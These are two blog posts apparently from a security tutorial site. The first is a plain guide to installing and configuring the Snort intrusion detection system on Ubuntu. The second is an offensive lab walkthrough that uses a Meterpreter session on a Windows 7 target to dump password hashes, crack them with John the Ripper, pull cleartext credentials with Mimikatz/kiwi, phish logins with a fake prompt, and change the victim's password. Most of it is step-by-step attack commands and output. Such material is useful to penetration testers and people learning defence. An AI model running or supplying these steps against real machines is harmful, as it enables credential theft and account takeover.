Configure Snort in Ubuntu (Easy Way)

In our previous article we had discussed “Manually Snort Installation” in your system but there is another method also available by apt-repository which reduce your manually effort and automatically configure snort in your system.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

  • Sniffer mode: it will observe network packets and present them on the console.
  • Packet logger mode: it will record packets to the disk.
  • Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 16.02 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu.

Check your network interface configuration by executing ifconfig command; from here I came to know 192.168.1.107 is my network IP.

Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites by a making update.

sudo apt-get update

It is an easiest way to install and configure the snort is your system because all its requirement whether it is snort rules directory or logging directory every packages is are stored by apt repository. Enter given below command to begin the snort installations. 

sudo apt-get install snort*

By defaut eth0 is listening interface is set in snort configuration since my network belongs to ens33,  therefore I choose it as listening interface as shown in given below image.

In next configuration step it will ask to enter CIDR value for address range for local network. From given image you can observe I had mention CIDR 192.168.1.1/24 for a range of 256 address.

You can also multiple values by using comma without space to separate those address

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24

Now run given below command to enable IDS mode of snort

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.

[Note: If apt- repository get failed to install snort then go with manual configuration from here.]

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Post Exploitation for Remote Windows Password

In this article you will leran how to extract Windows users password and change extracted password using metasploit framework. 

Here you need to exploit target machine once to obtain meterpreter session and then bypass UAC for admin privilege.

Requirement:

Attacker: kali Linux

Target: windows 7

Let’s Begin

Extracting User Account Password

1st method

So when your get meterpreter session of target system then follows given below steps:  

Execute given below command which will dump Hash value of all saved password of all windows users as shown in given below image.

meterpreter> hashdump

Now copy all hash value in a text file as shown below and save it. I had saved it as hash.txt on the desktop. It contains hash value of 4 users with SID value as 500: Administrator; 501: Guest; 1001: Penetst; 1000: Raj with their hash password.

Run your capture session in background:

meterpreter > background

Now a new terminal and use john the ripper to crack the hash by executing given below command:

john –wordlist=/root/Desktop/pass.txt –format=NT /root/Desktop/hashes.txt

/root/Desktop/pass.txt contain path of your password dictionary

/root/Desktop/hashes.txt contain path of hash password value

From given below image you can confirm we had successfully retrieved the password: 123 for user: raj by cracking its hash value.

2nd Method

This module will dump the local user accounts from the SAM database using the registry.

msf > use post/windows/gather/hashdump

msf post(hashdump) > set session 2

msf post(hashdump) > exploit

From given below image you can observe again we obtained hash value for local user account, repeat above step to crack these value using john the ripper.

If you will notice the highlighted text then you will observe that it has capture password hint for user RAJ: “first three digits”

3rd Method

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

msf > use post/windows/gather/smart_hashdump

msf post(smart_hashdump) > set session 2

msf post(smart_hashdump) > exploit

From given below image you can observe again we obtained hash value for RAJ and Administrator account, repeat above step to crack these value using john the ripper. Moreover it has capture same password hint for User Raj.

4th Method

This module harvests credentials found on the host and stores them in the database.

msf > use post/windows/gather/credentials/credential_collector

msf post(credential_collector) > set sessions 2

msf post(credential_collector) > exploit

This exploit also work in same manner and dump the hash value for local user account as shown in given below image, repeat above step to crack these value using john the ripper.

5th Method

This module will collect clear text Single Sign On credentials from the Local Security Authority using the Mimikatz extension. Blank passwords will not be stored in the database.

msf > use post/windows/gather/credentials/sso   

msf post(sso) > set sessions 2

msf post(sso) > exploit

This exploit will dump clear text password of login user as shown in given below image user: raj and password: 123

 

6th Method

At meterpereter session we can enable option “kiwi” which work similarly as “mimikatz” in windows, execute given below command: 

meterprerter > load kiwi

Now run following command which will extract all saved credential of local user account as shown in given below image, here also we had successfully  retrieve  password: 123 of user: raj

meterpreter > cred all

7th Method

This module is able to perform a phishing attack on the target by popping up a login prompt. When the user fills credentials in the login prompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a login prompt when a specific process is starting.

msf > use post/windows/gather/phish_windows_credentials

msf post(phish_windows_credentials) > set session 2

msf post(phish_windows_credentials) > exploit

As define above it will launch fake login prompt which will appear genuine to victim on his logon screen and wait for user to his credential.

At logon screen user will get a fake pop for his credential as his will enter his username and password for login into his system, attacker at background will sniff the entered credential.

From given below image you can observe the sniff credential for user raj. It saved username, domain and password in a table.

Change password of Remote system

1st Method

This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.

msf > use post/windows/manage/change_password

msf post(change_password) > set smbuser raj

msf post(change_password) > set old_password 123

msf post(change_password) > set new_password 987

msf post(change_password) > set session 1

msf post(change_password) > exploit 

Since after knowing logging user “raj” password you can easily change his password by exploiting above command. From given below image you can observe we had change password 123 into 987.

2nd Method

As we known meterepreter itself is a set of various options for post exploits it allows attacker to open command prompt of victims system without his permission by executing shell command as given below.

meterepreter> shell

net user

net user raj 123

Hence in 1st method we had change password into 987 from 123 and now again in 2nd method we had change password from 987 to 123 using simple CMD net user command as shown in given below command.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...